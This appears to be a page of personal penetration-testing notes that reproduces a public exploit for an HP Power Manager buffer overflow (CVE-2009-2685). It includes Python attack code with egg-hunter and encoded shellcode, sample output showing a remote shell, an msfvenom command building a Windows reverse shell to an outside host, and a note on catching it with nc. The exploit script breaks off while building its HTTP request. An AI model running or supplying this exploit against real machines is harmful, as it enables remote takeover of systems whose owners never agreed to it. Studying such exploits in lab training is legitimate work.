pof of Hewlett-Packard (HP) Buffer Overflow

#!/usr/bin/pythongedi
# HP Power Manager Administration Universal Buffer Overflow Exploit
# CVE 2009-2685
# Tested on Win2k3 Ent SP2 English, Win XP Sp2 English
# Matteo Memelli ryujin __A-T__ offensive-security.com
# www.offensive-security.com
# Spaghetti & Pwnsauce - 07/11/2009
#
# ryujin@bt:~$ ./hppowermanager.py 172.16.30.203
# HP Power Manager Administration Universal Buffer Overflow Exploit
# ryujin __A-T__ offensive-security.com
# [+] Sending evil buffer...
# HTTP/1.0 200 OK
# [+] Done!
# [*] Check your shell at 172.16.30.203:4444 , can take up to 1 min to spawn your shell
# ryujin@bt:~$ nc -v 172.16.30.203 4444
# 172.16.30.203: inverse host lookup failed: Unknown server error : Connection timed out
# (UNKNOWN) [172.16.30.203] 4444 (?) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.

# C:\WINDOWS\system32>

import sys
from socket import *

print "HP Power Manager Administration Universal Buffer Overflow Exploit"
print "ryujin __A-T__ offensive-security.com"

try:
   HOST  = sys.argv[1]
except IndexError:
   print "Usage: %s HOST" % sys.argv[0]
   sys.exit()

PORT  = 80
RET   = "\xCF\xBC\x08\x76" # 7608BCCF JMP ESP MSVCP60.dll

# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# badchar = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a"
SHELL = (
"n00bn00b"
"\x89\xe1\xdb\xdc\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x69\x6c\x4b\x58\x6c\x42\x47\x70\x57\x70\x77\x70\x33\x50\x6c"
"\x49\x7a\x45\x55\x61\x39\x50\x45\x34\x4e\x6b\x50\x50\x46\x50"
"\x4e\x6b\x63\x62\x76\x6c\x4c\x4b\x50\x52\x46\x74\x4e\x6b\x44"
"\x32\x54\x68\x64\x4f\x6f\x47\x32\x6a\x45\x76\x44\x71\x39\x6f"
"\x6c\x6c\x55\x6c\x53\x51\x51\x6c\x75\x52\x46\x4c\x45\x70\x6b"
"\x71\x68\x4f\x76\x6d\x45\x51\x6a\x67\x4d\x32\x4c\x32\x70\x52"
"\x66\x37\x4e\x6b\x73\x62\x66\x70\x4e\x6b\x71\x5a\x37\x4c\x6c"
"\x4b\x62\x6c\x57\x61\x70\x78\x58\x63\x47\x38\x47\x71\x38\x51"
"\x62\x71\x4e\x6b\x63\x69\x67\x50\x35\x51\x6e\x33\x6c\x4b\x37"
"\x39\x47\x68\x6a\x43\x67\x4a\x71\x59\x4c\x4b\x57\x44\x6e\x6b"
"\x56\x61\x69\x46\x75\x61\x69\x6f\x6e\x4c\x4f\x31\x78\x4f\x76"
"\x6d\x37\x71\x58\x47\x75\x68\x6b\x50\x34\x35\x7a\x56\x45\x53"
"\x73\x4d\x68\x78\x57\x4b\x63\x4d\x67\x54\x42\x55\x4d\x34\x73"
"\x68\x6c\x4b\x43\x68\x54\x64\x56\x61\x4a\x73\x35\x36\x6e\x6b"
"\x66\x6c\x50\x4b\x4c\x4b\x42\x78\x55\x4c\x76\x61\x6a\x73\x6e"
"\x6b\x77\x74\x6c\x4b\x33\x31\x6a\x70\x6f\x79\x53\x74\x54\x64"
"\x65\x74\x43\x6b\x31\x4b\x31\x71\x72\x79\x32\x7a\x76\x31\x39"
"\x6f\x79\x70\x63\x6f\x71\x4f\x33\x6a\x6c\x4b\x65\x42\x6a\x4b"
"\x4c\x4d\x71\x4d\x43\x58\x36\x53\x50\x32\x35\x50\x35\x50\x61"
"\x78\x32\x57\x61\x63\x47\x42\x43\x6f\x71\x44\x45\x38\x72\x6c"
"\x62\x57\x71\x36\x67\x77\x79\x6f\x79\x45\x38\x38\x4a\x30\x57"
"\x71\x53\x30\x65\x50\x66\x49\x6a\x64\x43\x64\x36\x30\x33\x58"
"\x31\x39\x6d\x50\x50\x6b\x33\x30\x79\x6f\x58\x55\x42\x70\x36"
"\x30\x36\x30\x42\x70\x63\x70\x70\x50\x37\x30\x72\x70\x43\x58"
"\x4a\x4a\x76\x6f\x49\x4f\x39\x70\x39\x6f\x78\x55\x4f\x67\x71"
"\x7a\x44\x45\x42\x48\x79\x50\x6e\x48\x36\x51\x6e\x62\x43\x58"
"\x63\x32\x37\x70\x47\x61\x31\x4c\x4b\x39\x49\x76\x70\x6a\x52"
"\x30\x43\x66\x32\x77\x52\x48\x4f\x69\x49\x35\x52\x54\x43\x51"
"\x59\x6f\x6a\x75\x6e\x65\x79\x50\x71\x64\x76\x6c\x59\x6f\x52"
"\x6e\x37\x78\x31\x65\x68\x6c\x51\x78\x58\x70\x68\x35\x39\x32"
"\x56\x36\x39\x6f\x79\x45\x35\x38\x35\x33\x42\x4d\x65\x34\x77"
"\x70\x6c\x49\x48\x63\x61\x47\x63\x67\x52\x77\x34\x71\x6a\x56"
"\x43\x5a\x67\x62\x70\x59\x32\x76\x6d\x32\x49\x6d\x52\x46\x58"
"\x47\x57\x34\x74\x64\x77\x4c\x46\x61\x63\x31\x6e\x6d\x43\x74"
"\x75\x74\x72\x30\x68\x46\x73\x30\x37\x34\x52\x74\x30\x50\x73"
"\x66\x33\x66\x32\x76\x33\x76\x30\x56\x62\x6e\x62\x76\x71\x46"
"\x32\x73\x72\x76\x63\x58\x34\x39\x7a\x6c\x65\x6f\x4b\x36\x79"
"\x6f\x39\x45\x6e\x69\x39\x70\x32\x6e\x63\x66\x43\x76\x69\x6f"
"\x54\x70\x52\x48\x77\x78\x4f\x77\x75\x4d\x43\x50\x4b\x4f\x4b"
"\x65\x4f\x4b\x78\x70\x6d\x65\x6d\x72\x43\x66\x75\x38\x49\x36"
"\x6d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x38\x55\x65\x6c\x45\x56\x71"
"\x6c\x77\x7a\x4f\x70\x6b\x4b\x59\x70\x61\x65\x44\x45\x4f\x4b"
"\x71\x57\x45\x43\x42\x52\x42\x4f\x43\x5a\x33\x30\x70\x53\x39"
"\x6f\x48\x55\x41\x41")

EH ='\x33\xD2\x90\x90\x90\x42\x52\x6a'
EH +='\x02\x58\xcd\x2e\x3c\x05\x5a\x74'
EH +='\xf4\xb8\x6e\x30\x30\x62\x8b\xfa'
EH +='\xaf\x75\xea\xaf\x75\xe7\xff\xe7'

evil =  "POST http://%s/goform/formLogin HTTP/1.1\r\n"
evil += "Host: %s\r\n"

the script specifies bad characters and the encoding for us.

Generate a shell code and paste it right after the egg, which is the "n00bn00b" 

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.49.130 -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" LPORT=4444 -e x86/alpha_mixed -f c

Now, all I needed to do was to have nc listner.

PreviousBuffer Overflow DictionaryNextCracking!

Last updated